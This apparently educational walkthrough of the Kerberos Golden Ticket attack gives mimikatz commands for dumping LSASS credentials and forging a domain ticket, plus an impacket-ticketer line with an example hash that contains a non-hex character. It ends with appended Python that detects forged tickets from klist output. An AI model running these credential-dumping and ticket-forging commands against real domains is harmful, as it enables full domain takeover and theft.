In this section we will learn about the Golden Ticket Attack.

First, let's start by dumping the LSASS process.

lsadump::lsa /patch


Notice that we got the hash of the krbtgt user.

Now let’s create our command.

kerberos::golden /User:golden /domain:zerosploit.co /sid: /krbtgt: /endin: /startoffset: /maxrenew: /ptt 


Now, let’s list the tickets.

klist


As observed, we are now the administrator user on the zerosploit.co domain.

The same ticket can be forged with Impacket's ticketer:

impacket-ticketer -nthash 62c9a5ddd565862f17ae1bd202bdn696 -domain-sid S-1-5-21-1519098244-989389543-2739619515 -domain zerosploit.co Administrator
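A defender-side check, added here as an example and not part of the original walkthrough: a forged TGT built with /endin and /maxrenew (mimikatz defaults to a 10-year ticket) and from the krbtgt NT hash shows up in klist with a lifetime no KDC policy would issue and an RC4 encryption type. The klist sample below is constructed, and the 10-hour / 7-day limits are the assumed domain defaults.

```python
import re
from datetime import datetime, timedelta
# Constructed klist output (not a real capture): #0 is a forged TGT carrying
# the 10-year lifetime kerberos::golden uses by default, #1 is a normal TGT.
SAMPLE_KLIST = """\
Cached Tickets: (2)

#0>     Client: golden @ ZEROSPLOIT.CO
        Server: krbtgt/ZEROSPLOIT.CO @ ZEROSPLOIT.CO
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/14/2024 10:00:00 (local)
        End Time:   3/12/2034 10:00:00 (local)
        Renew Time: 3/12/2034 10:00:00 (local)

#1>     Client: alice @ ZEROSPLOIT.CO
        Server: krbtgt/ZEROSPLOIT.CO @ ZEROSPLOIT.CO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 3/14/2024 09:00:00 (local)
        End Time:   3/14/2024 19:00:00 (local)
        Renew Time: 3/21/2024 09:00:00 (local)
"""

MAX_TGT_LIFE = timedelta(hours=10)  # assumed domain Kerberos policy defaults
MAX_RENEW = timedelta(days=7)

def _when(s):
    return datetime.strptime(s.replace(" (local)", ""), "%m/%d/%Y %H:%M:%S")

def parse_klist(text):
    """Return one dict per cached ticket with the fields the checks need."""
    tickets = []
    for block in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        f = dict(re.findall(r"^\s*([A-Za-z ]+?):\s*(.*?)\s*$", block, flags=re.M))
        start = _when(f["Start Time"])
        tickets.append({"client": f["Client"], "etype": f["KerbTicket Encryption Type"],
                        "life": _when(f["End Time"]) - start,
                        "renew": _when(f["Renew Time"]) - start})
    return tickets

def suspicious_tickets(text):
    """Flag cached TGTs whose properties the KDC's policy would never produce."""
    findings = []
    for t in parse_klist(text):
        checks = [(t["life"] > MAX_TGT_LIFE, "lifetime %s exceeds policy" % t["life"]),
                  (t["renew"] > MAX_RENEW, "renew window %s exceeds policy" % t["renew"]),
                  ("RC4" in t["etype"], "RC4 TGT: forged from the krbtgt NT hash, not AES keys")]
        why = [msg for hit, msg in checks if hit]
        if why:
            findings.append((t["client"], why))
    return findings
```

The same lifetime and encryption-type checks apply to Event ID 4769/4768 records collected centrally, where the forged ticket is visible even if the host's cache has been purged.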